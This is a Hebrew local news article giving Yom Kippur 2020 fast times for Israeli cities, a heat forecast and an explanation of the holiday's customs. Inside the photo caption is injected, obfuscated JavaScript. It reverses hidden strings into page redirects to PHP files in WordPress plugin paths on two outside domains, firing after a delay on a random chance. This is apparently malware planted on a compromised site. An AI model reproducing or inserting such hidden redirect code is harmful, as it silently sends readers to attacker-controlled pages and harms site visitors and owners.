fbpx
[shortcode-weather-atlas city_selector=1178237 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

יום כיפור 2020 – כניסת הצום וצאתו

מתי נכנס הצום ומתי הוא יוצא? יום כיפור 2020. מזג האוויר חם מהרגיל ואיך יראה יום הכיפור השנה בצל מגפת הקורונה.
יום כיפור | צילום: shutterstock
יום כיפור | צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

יום הכיפורים יחל השנה ביום ראשון, 27 בספטמבר 2020 ט' בתשרי התשפ"א ויסתיים ביום שני, 28 בספטמבר 2020 י' בתשרי התשפ"א. התפילות בבתי הכנסת יתקיימו על פי מגבלות הסגר שהוטל על המדינה בשל הקורונה.

זמנים:

ירושלים: 
כניסת הצום: 17:53
צאת הצום: 19:03

תל אביב:
כניסת הצום: 18:09
צאת הצום: 19:05

חיפה:
כניסת הצום: 18:02
צאת הצום: 19:04

טבריה:
כניסת הצום: 17:57
צאת הצום: 19:02

צפת:
כניסת הצום: 18:02
צאת הצום: 19:02

באר שבע:
כניסת הצום: 18:11
צאת הצום: 19:05

אילת:
כניסת הצום: 18:00
צאת הצום: 19:04

 

מזג האוויר בכיפור: צפוי להיות שרבי, בעיקר בצפון מזרח המדינה. אחרי סוף שבוע נעים יחסית, שבו תהיה הקלה בעומס החום, ביום ראשון, ערב יוה"כ, וביום שני, תהיה עלייה משמעותית במידות החום. הטמפרטורות החזויות צפויות לעבור את ה-30°, כשבעמק בית שאן ובכנרת צפויות מעל 40° חום.

מה מציינים ביום הכיפורים: 

יום הכיפורים נחשב לקדוש ביותר עבור היהודים. הוא חל בכל שנה ב-י' בתשרי ומהווה את סיומם של "עשרת ימי תשובה", המתחילים בראש השנה ובהם אמורים היהודים לבקש סליחה איש מרעהו. רבים מן היהודים, גם אלו שאינם צמים בימי הצום האחרים הקבועים בלוח השנה היהודי, מקיימים את מצוות הצום ביום כיפור. למעשה, הצום הוא רק חלק מתוך התענית, אחד מחמשת "איסורי עינוג הגוף" המהווים מצווה ביום כיפור וכוללים מלבד הימנעות מאוכל ושתייה גם הימנעות מנעילת נעלי עור, רחצה, קיום יחסי מין ו"סיכת הגוף" (הימרחות בשמנים וקרמים למיניהם).

מעבר לצום ולתענית, הרי שביום כיפור קיימת מצוות איסור מלאכה, בדומה ליום שבת (הלכתית, מצוות יום כיפור הן פחות חמורות משבת). בישראל, מצוות איסור המלאכה הזו הובילה למסורת לפיה רבים, גם אם אינם יהודים אדוקים, לא נוסעים במכוניותיהם החל מכניסת הצום בערב הכיפורים ועד ליציאתו כ-25 שעות לאחר מכן. בשל כך, ניתן למצוא בכבישי הארץ ילדים ומבוגרים רבים המנצלים את ההזדמנות על מנת לרכב על האופניים. את תחילתו של יום הכיפורים נוטים לציין עם סעודה מפסקת, בה מנסים הצמים לאכול דברים שיעניקו להם אנרגיות ליממה הקרובה. סיום הצום מצויין אף הוא עם סעודה. בדומה לראש השנה, גם ביום כיפור תוקעים בשופר. התפילות המוכרות ביותר הן "וידוי", "ונתנה תוקף" ו"כל נדרי".

 

הישארו מעודכנים באתר בלינקר ובפייסבוק של צפון 1 גליל מערבי ובחדשות נהריה

כבר הורדתם את האפליקציה החדשה של חדשות נהריה?

לחצו על הלינק והורידו אותה עכשיו בחינם:🥳

לינק הורדה למערכת אנדרואיד – לחצו כאן!

לינק הורדה מחנות אפל – לחצו כאן!

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות